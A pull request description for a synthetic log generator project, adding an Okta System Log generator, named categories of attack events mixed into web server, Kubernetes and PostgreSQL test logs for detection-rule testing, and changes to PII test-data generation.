feat: Add Okta generator, security log patterns, and PII improvements

[joe-armstrong]

Proposed Change

This PR adds a few things after using Blitz some more for testing:

New Okta System Log Generator

Added a full Okta generator (generator/okta/) that produces realistic Okta System Log events — authentication (login, SSO, MFA), security threats (brute force, credential stuffing, impossible travel), user lifecycle, password ops, app/group membership, policy changes, and admin actions. Follows the same worker/rate/backoff pattern as the other generators. Includes tests and docs.

Security-Focused Log Patterns

The Apache, NGINX, Kubernetes, and PostgreSQL generators now include security event patterns mixed into their output (~20% of web server requests are attack patterns). This gives us realistic data for testing security detection rules:

• Apache/NGINX: Directory traversal, SQL injection, XSS, command injection, SSRF, Log4j/JNDI, scanner reconnaissance, auth bypass attempts
• PostgreSQL: Auth brute force, SQL injection, privilege escalation, data exfiltration, suspicious admin actions
• Kubernetes: RBAC violations, pod security policy failures, container escape attempts, network policy violations, secret access, cryptomining detection

The attack paths for Apache and NGINX are shared via internal/generator/security/paths.go to avoid duplication.

PII Generator Improvements

• Each PII log now includes a random selection of 1-5 PII fields instead of dumping all 37 every time — more realistic
• Restored secret_ as an API key prefix for better PII detection testing

Docker Compose Cleanup

Consolidated back to a single docker-compose.telemetry-generator.yml with all generators. Removed the split pipeline configs that were from internal testing. All generators default to 1 worker. Updated README with vendor-agnostic OpAMP examples.

Checklist

• Changes are tested
• CI has passed

[joe-armstrong]

@iris cr